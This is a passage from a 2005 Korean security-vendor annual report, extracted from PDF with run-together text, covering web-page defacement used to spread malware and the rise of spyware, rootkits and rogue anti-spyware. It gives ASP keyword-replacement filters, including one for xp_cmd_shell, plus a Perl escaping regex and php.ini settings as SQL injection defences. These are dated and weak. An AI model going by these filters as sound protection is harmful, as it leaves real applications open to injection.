48 VI. 2005 년 Key Issue I - 홈페이지변조를통한악성코드유포 위함수들대신인자값에버퍼크기가필요한 bcopy(), fgets(), memcpy(), strncpy(), snprintf(), strccpy(), strcadd(), vsnprintf() 등의함수를대체하여사용하도록한다. 6) SQL 인젝션 (Injection) 취약점웹어플리케이션은일반적으로데이터베이스와연동되는경우가많다. SQL 인젝션은사용자의입력이필요한곳에 SQL 쿼리 (Query) 문을넣어악의적인명령어를수행하는기법이다. 이를예방하기위해서는사용자의입력이필요한변수에유효성검사 (Input Validation) 를해야하며, 쉘메타캐릭터문자들인.<>* &;$!#()[]{}: /^\n\r 등을제거해야 SQL 인젝션공격에대해안전할수가있다. ASP에서 SQL 인젝션을방지하는여러가지기법중가장손쉬운방법은다음과같다. field = replace(field, "'", "''") field = replace(field, "select","query_try") field = replace(field, "insert","query_try") field = replace(field, "delete","query_try") field = replace(field, "drop","query_try") field = replace(field, "xp_cmd_shell","query_try") Perl 인경우에는다음과같이하면된다. $value =~ s/([;<>\*\ `&\$!#\(\)\[\]\{\}:'"])/\\$1/g; PHP 설정화일인 php.ini 에는보안을강화하는옵션이존재한다. 다음과같이옵션을설정하여보안을강화한다. allow_url_fopen = Off magic_quotes_gpc = On register_globals = Off 따라서, 웹어플리케이션의전체소스코드를검사하여위에열거된취약점제거방법들을적용하여야웹어플리케이션취약점존재로인한피해를예방할수있다. 서버상의취약점및해결방법 mod_php, mod_perl, mod_python 등은아파치모듈로, 스크립트언어가동작할수있다. 해당하는모듈에취약점이발생하면웹서버권한을빼앗기게되며, 이를이용하여서버에접근할수있게된다. 2005년상반기에 PHP의리모트버퍼오버플로우 (Remote Buffer Overflow) 취약점이나온이후크래커들이이취약점을이용하여웹서버를공격하는것으로보여진다. 이취약점으로인한피해를예방하기위해사용하는 PHP 버전을체크하여항상최신버전으로패치하도록한다. 또한윈도우 NT계열의 IIS를사용하는관리자는반드시최신보안패치를모두적용하고, 불필

49 VI. 2005 년 Key Issue I - 홈페이지변조를통한악성코드유포 요한서비스를제거하여야만최소한의안전을지킬수가있다. 일반사용자컴퓨터의취약점및해결방법신뢰되지않는사이트에대한접속을자제하며, 사용하는 OS 및응용프로그램의최신보안패치를반드시적용하도록한다. 또한, 악성코드의감염에대비하여백신제품을설치하고개인방화벽소프트웨어를함께사용하도록한다. 향후전망윈도우 XP 서비스팩2의출시와더불어제공된 DEP, Heap 구조변화로오버플로우를사용하여특정서비스에대해공격하는것이매우힘들게되었고, 윈도우비스타 (Windows Vista) 에는이기능들이더욱강화되고개인방화벽이제공될예정이어서서비스를통한웜의감염은앞으로감소할것으로예상된다. 그에반해웹을통한악성코드의유포는다운로더, 드롭퍼, 스파이웨어, 무차별웹서버공격, 웹어플리케이션공격등공격기법의발전과더불어지속적으로증가할것으로예상된다. ASEC

2005 년 Key Issue II VII. 스파이웨어피해증가와기법의고도화 작성자 : 박시준연구원 (sjpark@ahnlab.com) 2005년은금전적이익을목적으로한스파이웨어의피해가급증한한해였다고단언할수있다. 특히악의적인목적을가진소수의제작자가제작하여유포하는악성코드와는달리스파이웨어는회사차원에서조직적으로제작, 배포되고있어, 이들의안티스파이웨어진단을회피하기위한기법들또한고도화되어가는추세이다. 또한비교적진입장벽이낮은안티스파이웨어시장의특성으로인해다수의안티스파이웨어제품이출시되고이들간의경쟁으로인한불법적인배포로일반사용자들은오히려피해를입는경우도종종발생하고있다. 특히외국업체의경우스파이웨어가허위또는과장된진단결과를보여주어결제를유도하는허위안티스파이웨어 (Rogue) 를설치하는경우가꾸준히증가하고있다. 이러한피해가증가됨에따라정보통신부는스파이웨어를규정하는기준안문서를발표해명백한스파이웨어에대해서는법적인처벌을받을수있는근거를마련하였다. 2005년한해스파이웨어의주요이슈및흐름을요약하면다음과같다. - 스파이웨어의증가및배포방법의다양화 - 스파이웨어제작기술의고도화 - 허위안티스파이웨어의증가 - 정보통신부의스파이웨어기준안발표 스파이웨어의증가및배포방법의다양화 2005년스파이웨어에의한피해를크게증가시킨원인중하나는다운로더 (Downloader) 계열의악성코드이다. 이는자체전파력이없는스파이웨어나애드웨어같은유해가능프로그램을배포하는데가장효과적인방법중하나였다. 유해가능프로그램을다운로드하는악성코드들은공통적으로다음과같은특징을가지고있다. - 백그라운드로실행하여사용자가실행중인사실을인지하기어렵다. - 사용자동의없이시작프로그램에등록되어실행된다. - 다수의유해가능프로그램의다운로드와실행을시도한다. 2005년발견된유해가능프로그램중에서큰피해를입힌엔케이스 (Win- Adware/nCase), 바겐버디 (Win-Adware/BargainBuddy), 미디어티켓츠 (Win- Adware/MediaTickets), 아이에스티바 (Win-Adware/ISTBar) 애드웨어등은다운로더에의해설치된대표적인유해가능프로그램이다. 초기의다운로더는비교적단순한코드를사용한반면최근에는 DLL 코드삽입기법 (DLL Injection) 을사용하여정상윈도우프로세스와함께실행되거나클라이언트에설치된방화벽소프트웨어의차단을우회하는기법을사용하는등그기법이점점고도화되고있다. 또한허위로제작된마이크로소프트업데이트페이지나안티바이러스프로그램제작사의웹페이지를팝업으로노출하여유해가능프로그램의설치를유도하는클리커 (Clicker), IE 보안설정을낮게변경하고유해가능프로그램의 ActiveX 코드가삽입

51 VII. 2005 년 Key Issue II - 스파이웨어피해증가와기법의고도화 된웹페이지를노출하여사용자동의없이유해가능프로그램을설치하는로존 (LowZones) 계열의악성코드도증가하였다. 보안취약점을이용하여설치를시도하는유해가능프로그램의증가도 2005년스파이웨어동향의큰특징중하나이다. 최근에발견된 WMF 파일의취약점을이용하여애드웨어를비롯한여러유해가능프로그램의설치를시도하는악의적인 WMF 파일과피해사례가다수보고되었으며, 국내에서는웹사이트해킹으로 IE 보안취약점을공격하는코드를삽입하고패치가적용되지않은시스템을이용하는사용자가이웹페이지를방문하는경우게임계정탈취목적의스파이웨어가설치되는피해가여러건발생하였다. 국내의경우 ActiveX의형태로카페나대형포탈사이트게시판을통해대량으로배포를시도하는애드웨어의피해가가장많았다. 이들은대부분설치하는프로그램에대해용도를속이거나충분한설명을하지않아사용자는애드웨어라는사실을알지못한채프로그램을설치하게된다. 이러한애드웨어는백그라운드로동작하여팝업광고를지속적으로노출하거나시스템설정을변경하여컴퓨터작업을방해하며, 제거후에도해당애드웨어를배포하는웹사이트에방문하는것만으로도기존에설치된 ActiveX 컨트롤에의하여사용자동의없이재설치되어많은사용자가피해를입었다. 스파이웨어제작기술의고도화악성코드는개인또는특정해커그룹에서주로제작되었지만스파이웨어의경우회사차원에서제작되고배포되는형태가많다. 따라서보안소프트웨어의진단을회피하기위해다양한기술이접목되는형태를보이고있으며악성코드에서사용하는악의적인기법을사용하는사례도부쩍늘어났다. 최근들어자주사용되는기법들을살펴보자. 루트킷 (Rootkit) 은악의적인목적으로자신의존재를은폐하는프로그램또는프로그램도구로, 악성코드가사용자로부터자신의존재를은폐하고안티바이러스, 안티스파이웨어또는시스템관리프로그램으로부터의검출을피하기위해서자주사용된다. 루트킷을사용하면일반적인방법으로는프로그램의존재사실은물론실행중인사실또한확인할방법이없다. 또한 [ 그림1] 과같이안티스파이웨어제품에서도후킹된정보를복원하지않고서는이들스파이웨어를진단조차할수없다. 2005년초부터꾸준히감염사례가보고된 Win-Adware/ToolBar.EliteBar의경우루트킷기법을사용한대표적인애드웨어이다. 이는인터넷익스플로러툴바를설치하지만사용자는설치된파일을확인할수없고동작사실도확인할수없을뿐아니라삭제도불가능하여이에대한문의가꾸준히접수되었다. 최근 Sony BMG의 DRM(Digital Rights Management) 관련소프트웨어가이루트킷기법을사용하여큰문제가되었으며, 실제이를악용한악성프로그램이등장하기도했다. 하지만루트킷제거프로그램을배포하고, 소비자를상대로보상정책을발표하는등사용자입장에서사건을해결하려는노력을보여줬다. 국내의경우도모업체에서자사의한글키워드도우미서비스를보호할목적으로루트킷을사용한보호프로그램을사용해문제가된적이있었다. 하지만이를진단하고치료한업체를대상으로법적소송을제기해사용자의입장이아닌자사의입장에서문제를해결하려는상반된결과를보여줬었다. 이런기법을사용한스파이웨어를진단하고치료할수있는기능을가진안티스파이

52 VII. 2005 년 Key Issue II - 스파이웨어피해증가와기법의고도화 웨어는몇몇메이저업체이외엔거의없어사용자의피해는계속증가될전망이다. [ 그림 1] 비드로다운로더 (Win-Downloader/Vidro) 에의해후킹된 API 정보 정상프로그램을이용하는사례도자주발견되고있다. 스타트페이지스파이웨어 (Win-Spyware/StartPage.30720) 의경우정상적인구글툴바를설치한다. 하지만추가로윈도우의호스트파일또한변경하여구글, MSN, 야후등의각나라별인터넷주소를모두스파이웨어에서사용하는주소로변경해버린다. 따라서사용자는구글, MSN, 야후를사용하지만실제검색된결과는스파이웨어에서의도한페이지로변경되어나타나게된다. 또한 PWS. 리니지핵.46386 스파이웨어 (Win-Spyware/PWS.Lineage.46836) 의경우윈도우내에포함된 IPv6를 IPv4로변환해주는 6to4 서비스와동일한서비스키를생성하여스파이웨어를설치하고실행한다. 실제 6to4 서비스를이용하는사용자라면스파이웨어가실행됨은물론이고추가적으로 6to4 서비스를제공받지못하게되어이중의피해를입을수있다. 파일을암호화하거나실행압축프로그램으로압축하여안티스파이웨어가자신을진단하는것을회피하는기법의사용도부쩍늘었다. 대표적인사례로크립터스파이웨어 (Win-Spyware/Crypter.gen) 를들수있다. 이런스파이웨어들은설치될때마다파일의내용이변경되어휴리스틱진단기법등을사용하여야하는문제점을지니고있다. 스파이웨어는수적증가와함께위와같은제작기법의고도화로보안소프트웨어의진단기법을회피하려고다양한시도를하고있다. 이런추세는앞으로도계속될전망이며이에따라사용자의피해도더욱더늘어날전망이다. 허위안티스파이웨어프로그램의증가스파이웨어의위협과실제적인피해가증가하면서이를악용한허위안티스파이웨어프로그램이크게증가하였다. Rogue/Suspected 프로그램으로분류되는허위안티스파이웨어프로그램은허위, 과장된스파이웨어검사결과를보여주고이를제거하려고하면이용료를요구한다. 현재보고된허위안티스파이웨어프로그램은약 250 여개에이르고있으며현재도꾸준히변형이제작, 배포되고있다. 허위안티스파이웨어는 ActiveX를통해배포하거나클리커류의스파이웨어에의해설치되며, 최근 WMF 취약점을사용한스파이웨어인 Win-Exploit/WMF의경우도허위안티스파이웨어를설치하는데사용되었다.

53 VII. 2005 년 Key Issue II - 스파이웨어피해증가와기법의고도화 스파이웨어위협이증가하면서안티스파이웨어프로그램이쉽게돈을벌수있는아이템으로부각되자애드웨어제작업체까지도안티스파이웨어프로그램을제작하거나, 실제로는동일한프로그램의유저인터페이스를변경하여다른안티스파이웨어프로그램인것처럼제작하여배포하는경우도있다. 국내에도약 40여개의안티스파이웨어프로그램이제작, 배포되고있으며불특정웹사이트를통해 ActiveX를이용하여대량으로배포되고있다. 이들중상당수는정상파일, 정상레지스트리를오진 (False Positive) 하거나과장된진단결과를보여주고결제를유도하며일부업체는자동결제연장기능을사용하여문제가되기도하였다. 안티스파이웨어프로그램의과열경쟁으로인한금전적인피해이외에도삭제후에사용자동의없이재설치되거나치료후에도동일한스파이웨어가발견되는등의여러가지피해사례도보고되었다. 또한다수의사용자를확보하기위하여스팸메일이나불특정웹사이트-포털사이트의게시판이나인터넷커뮤니티의게시판-에다수의 ActiveX 설치프로그램을삽입하여불편을주고프로그램을제거한후에도 ActiveX 설치프로그램이남아있어불특정웹사이트를방문하는것만으로도사용자동의없이재설치되는피해사례가다수보고되었다. 또한최근에는직접윈도우의바탕화면을변경하거나, [ 그림2] 와같이시스템트레이영역에윈도우보안경고를위장한거짓경고메시지를풍선도움말로보여주며사용자의설치및결제를유도하는형태의클리커가다수보고되었으며국내에서도다수의피해사례가보고되었다. 피에스가드 (Win-Adware/Rogue.PSGuard), 스파이쉐리프 (Win-Adwre/ Rogue. SpySheriff), 스파이엑스 (Win-Adware/Rogue.SpyAxe) 등이많은피해를입힌허위안티스파이웨어프로그램이다. [ 그림 2] 스파이웨어에의해변조된바탕화면과허위보안경고도움말